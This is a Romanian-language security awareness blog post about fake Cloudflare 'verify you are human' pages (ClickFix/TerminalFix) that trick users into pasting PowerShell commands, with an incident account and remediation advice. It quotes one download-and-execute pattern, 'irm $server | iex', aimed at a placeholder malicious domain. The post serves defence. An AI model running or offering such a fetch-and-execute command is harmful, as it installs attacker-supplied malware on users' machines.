Fake Cloudflare: verificarea care te poate face să instalezi singur malware pe calculator

Fake-Cloudflare-explicat-de-GDPR-Complet

Intri pe un site pe care îl cunoști. Pagina se încarcă, dar înainte să poți continua apare ceea ce pare a fi o verificare Cloudflare.

„Verify you are human.”

Până aici, nimic neobișnuit.

Apoi însă ți se cere să deschizi Windows Terminal sau PowerShell, să lipești o comandă și să apeși Enter pentru a finaliza verificarea.

În acel moment trebuie să te oprești.

Nu mai este vorba despre o verificare CAPTCHA legitimă, ci foarte probabil despre un atac de tip ClickFix sau una dintre variantele sale recente, precum TerminalFix.

Scopul atacului este surprinzător de simplu: în loc să exploateze direct o vulnerabilitate a calculatorului, atacatorul îl convinge pe utilizator să execute singur codul malițios.

Microsoft a documentat inclusiv campanii TerminalFix în care site-uri compromise afișau false verificări Cloudflare și îi îndrumau pe utilizatori să copieze și să execute comenzi PowerShell.

Cum funcționează un atac ClickFix?

Atacul pornește, de multe ori, de la un site perfect legitim care a fost compromis.

Utilizatorul nu intră neapărat pe un site obscur sau pe un domeniu evident malițios. Poate ajunge pe site-ul unei companii pe care îl cunoaște și în care are încredere.

Lanțul poate arăta astfel:

Site legitim compromis → script malițios → falsă verificare Cloudflare → utilizatorul deschide PowerShell → execută comanda → malware-ul este descărcat și executat

Tocmai componenta de inginerie socială face acest atac atât de eficient.

Browserul nu descarcă neapărat direct un fișier .exe suspect. În schimb, utilizatorul primește instrucțiuni aparent tehnice și este convins că executarea lor este necesară pentru verificarea identității.

Cloudflare nu are nevoie să rulezi PowerShell

Cloudflare Turnstile este o tehnologie destinată verificării automate a browserului și a interacțiunii utilizatorului. Challenge-urile sunt executate în browser, iar validarea se realizează prin tokenuri între browser, website și infrastructura Cloudflare.

O verificare legitimă nu are nevoie ca utilizatorul:

  • să deschidă PowerShell;
  • să deschidă Command Prompt;
  • să deschidă Windows Terminal;
  • să apese Win + R;
  • să execute o comandă copiată în clipboard;
  • să dezactiveze antivirusul;
  • să modifice setările de securitate Windows.

Dacă o presupusă verificare CAPTCHA îți cere unul dintre aceste lucruri, nu continua.

De ce funcționează atât de bine?

Pentru că atacatorul exploatează mai întâi omul, nu calculatorul.

Interfața poate reproduce foarte convingător:

  • logo-ul Cloudflare;
  • culorile serviciului;
  • mesaje precum „Checking browser integrity”;
  • „TLS Handshake”;
  • „Bot Detection”;
  • bare de progres;
  • un fals „Ray ID”;
  • mesajul final „Verification successful”.

Utilizatorul are impresia că participă la un proces normal de securitate.

În realitate, uneori chiar acea „verificare” este generată de codul malițios.

Ce poate ascunde o comandă aparent banală?

Într-un incident analizat recent de echipa noastră, utilizatorului i-a fost furnizată o comandă PowerShell construită aproximativ după modelul:

$server='https://[domeniu-malicios]'; irm $server | iex

Cele două elemente importante sunt:

irm – alias PowerShell pentru Invoke-RestMethod, care poate descărca informații de la un server;

iex – alias pentru Invoke-Expression, care execută textul primit ca instrucțiuni PowerShell.

Tradus foarte simplu, o asemenea combinație poate însemna:

„Descarcă de pe acest server ceea ce îți trimite și execută imediat.”

Utilizatorul nu vede neapărat ce cod este executat în etapa următoare.

Ce am observat într-un incident real

În cazul analizat de noi, site-ul legitim fusese compromis și afișa o falsă verificare Cloudflare.

Investigația endpoint-ului de pe care fusese accesat site-ul a permis reconstruirea unei părți importante a atacului.

După executarea comenzii inițiale au urmat:

  • lansarea unui PowerShell ascuns;
  • utilizarea ExecutionPolicy Bypass;
  • conectarea la infrastructura controlată de atacator;
  • descărcarea unui payload suplimentar;
  • decodarea și extragerea acestuia în profilul utilizatorului;
  • lansarea unor noi procese PowerShell fără fereastră vizibilă;
  • încărcarea și compilarea dinamică de cod .NET/C#;
  • crearea unor componente DLL temporare;
  • încercarea de ștergere a unor artefacte după execuție.

În aceeași fereastră de timp, soluția antivirus instalată pe calculator a identificat și blocat un DLL clasificat drept loader malware.

Acest lucru este important: falsa verificare nu reprezenta doar o reclamă sau un pop-up nedorit. Mecanismul putea conduce efectiv la executarea de malware pe dispozitivul vizitatorului.

Ce este un „loader”?

Un loader este, simplificat, o componentă care pregătește sau încarcă alte componente malițioase.

Scopul său nu trebuie să fie neapărat furtul direct al parolelor.

Poate reprezenta doar prima sau a doua etapă a unui atac mai complex și poate încărca ulterior:

  • infostealere;
  • troieni;
  • programe de acces de la distanță;
  • componente de persistență;
  • alte payload-uri.

De aceea mesajul antivirusului „amenințarea a fost blocată” este foarte important, dar nu este întotdeauna suficient pentru a concluziona că nicio etapă anterioară nu a fost executată.

Am executat comanda. Ce fac?

Dacă ai executat deja o asemenea comandă, situația trebuie tratată ca un posibil incident de securitate.

Recomandările de bază sunt:

  1. Deconectează calculatorul de la rețea și de la VPN, în special dacă este un dispozitiv de serviciu.
  2. Nu continua să introduci parole sau să accesezi sisteme critice de pe dispozitiv.
  3. Rulează o scanare completă cu soluția antivirus/EDR.
  4. Dacă soluția permite, efectuează și o scanare offline / Rescue Environment.
  5. Păstrează istoricul PowerShell și logurile Windows înainte de a începe să ștergi manual fișiere.
  6. Verifică mecanismele de persistență: servicii, Scheduled Tasks, Registry Run, Startup etc.
  7. Schimbă parolele conturilor critice de pe un alt dispozitiv despre care știi că este curat.
  8. Pentru conturile importante, revocă sesiunile existente și tokenurile de autentificare.
  9. Dacă este o stație de lucru cu acces administrativ, VPN, infrastructură internă sau informații sensibile, trebuie luată în calcul inclusiv reinstalarea sistemului dintr-o sursă sigură.

În mediul organizațional, incidentul trebuie raportat imediat către IT/securitate.

Dar dacă antivirusul a blocat malware-ul?

Este un semn bun, dar întrebarea corectă este:

„În ce etapă a atacului a intervenit antivirusul?”

Dacă prima comandă a reușit deja să descarce și să execute cod suplimentar, faptul că antivirusul blochează ulterior un DLL nu demonstrează automat că toate componentele atacului au fost neutralizate.

Analiza trebuie să țină cont de întreaga cronologie.

Ce trebuie să facă proprietarul site-ului compromis?

Problema nu se termină la calculatorul utilizatorului.

Dacă un website legitim a distribuit acest mecanism, administratorul site-ului trebuie să investigheze:

  • cum a fost compromis site-ul;
  • ce fișier, plugin, temă sau componentă a fost modificată;
  • dacă au fost compromise credențiale;
  • dacă atacatorul a avut acces la hosting sau la baza de date;
  • de când era prezent codul;
  • câți vizitatori au fost expuși;
  • dacă scriptul era afișat tuturor sau selectiv;
  • dacă există alte mecanisme de persistență;
  • dacă au fost afectate și date cu caracter personal.

A șterge scriptul malițios este o măsură de remediere importantă.

Dar nu este, singură, o investigație a incidentului.

Lecția principală

ClickFix funcționează deoarece schimbă regulile clasice ale atacului.

Atacatorul nu îți spune:

„Instalează acest virus.”

Îți spune:

„Demonstrează că ești om.”

Iar o interfață familiară și câteva instrucțiuni aparent tehnice sunt uneori suficiente pentru ca utilizatorul să execute singur următoarea etapă a atacului.

Reține o regulă foarte simplă:

Nicio verificare legitimă Cloudflare/CAPTCHA nu ar trebui să îți ceară să deschizi PowerShell, Windows Terminal sau Command Prompt și să execuți cod pentru a demonstra că ești om.

Dacă vezi așa ceva, închide pagina și anunță administratorul site-ului sau departamentul IT.

Despre incidentele de securitate

Dacă organizația dumneavoastră a suferit un incident cibernetic și există posibilitatea ca acesta să fi afectat și date cu caracter personal, investigația tehnică trebuie corelată cu evaluarea obligațiilor prevăzute de GDPR.

GDPR Complet oferă servicii de DPO externalizat, consultanță GDPR și suport în evaluarea incidentelor de securitate și a eventualelor obligații de notificare.

Inginer software și expert în securitatea datelor

Cu o carieră impresionantă de peste 20 de ani în domeniul IT, Dan Gurghian este recunoscut pentru expertiza sa vastă în dezvoltarea software și securitatea informației. Deținător al mai multor certificări prestigioase Microsoft, Dan a demonstrat o competență excepțională și o dedicare neclintită pentru excelență tehnologică.

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile obligatorii sunt marcate cu *